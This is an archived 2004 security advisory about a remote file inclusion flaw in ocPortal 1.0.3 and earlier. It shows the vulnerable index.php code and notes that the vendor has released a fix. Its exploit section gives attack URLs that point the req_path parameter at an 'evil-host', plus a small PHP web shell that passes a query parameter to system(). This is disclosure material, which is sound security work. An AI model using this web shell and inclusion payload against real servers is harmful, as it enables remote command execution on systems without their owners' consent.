exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Hackgen Security Advisory 2004.2

Hackgen Security Advisory 2004.2
Posted Oct 24, 2004
Authored by Exoduks, Hackgen | Site hackgen.org

ocPortal is a Content Management System and portal. ocPortal versions up to 1.0.3 may allow for execution of commands via included scripts on the system where it is installed.

tags | advisory
SHA-256 | eca3b9732f89bcc8ba47ae442b4066acc6b229b03d92e81739b856751de8094c

Hackgen Security Advisory 2004.2

Change Mirror Download
http://www.hackgen.org/advisories/hackgen-2004-002.txt

''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
' [hackgen-2004-#002] '
''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
' Remote file inclusion bug in ocPortal 1.0.3. '
''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''

Software: ocPortal <= 1.0.3
Homepage: http://ocportal.com
Author: "Exoduks" - HackGen Team
Release Date: 11 October, 2004
Website: www.hackgen.org
Mail: exoduks [at] gmail . com



0x01 - Affected software description:
-------------------------------------
ocPortal is the leader in community CMS and portal software for the web.
It allows you to create and configure your own website within minutes.
It's packed full of innovative features that you will not find in competing
software (such as support for multi-site networks, or flexible page view
permissions), taking a completely different approach to the mainstream
competition. ocPortal can seamlessly integrate with most major forum systems,
has an innovative point system for your members to enjoy, support for all your
content (downloads, banners, galleries, and more), the ability to add new pages
as easily as writing a text file, and produces robust and standard compliant
pages. No other CMS package can do all of that.
// from ocportal.com



0x02 - Vulnerability Discription:
---------------------------------
This vulnerability exists in index.php because there isn't a check for
path in $req_path variable. So we can change the path to some evil host were
the funcs.php script is and we can even run some system command with the evil
script. I have mentioned that you can run system commands with evil script so
this is very critical bug. I sugest you that you immediatly get new version
of this portal.



0x03 - Vulnerability Code:
--------------------------
Vulnerability code is at the beagining of index.php

----- beging the code in index.php -----

if (!isset($req_path)) $req_path="";
require_once($req_path."funcs.php");

----- end of the code -----



0x04 - How to fix this bug:
---------------------------
Vendor has already publish new scipt with this fix and you can get new versions
of this portal from http://ocportal.com/



0x05 - Exploit:
----------------

http://localhost/ocp-103/index.php?req_path=http://evil-host/

On your evil host you must put scipt funcs.php.
Example of funcs.php if your host doesn't support php.

<?php
$com = $_GET["com"];
system ("$com");
?>

Example of funcs.php if your host support php.

<?php
echo '<?php $com = $_GET["com"]; system ("$com"); ?>';
?>

http://localhost/ocp-103/index.php?req_path=http://evil-host/&com=ls



0x006 - The End:
----------------
The end of my second advisor. There will be more advisories but i don't know
when :). Till then you can visit http://forum.hackgen.org.
Grettzz to: All croatian people expecialy Downbload !



______________________________________
Written By Exoduks - www.hackgen.org

Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close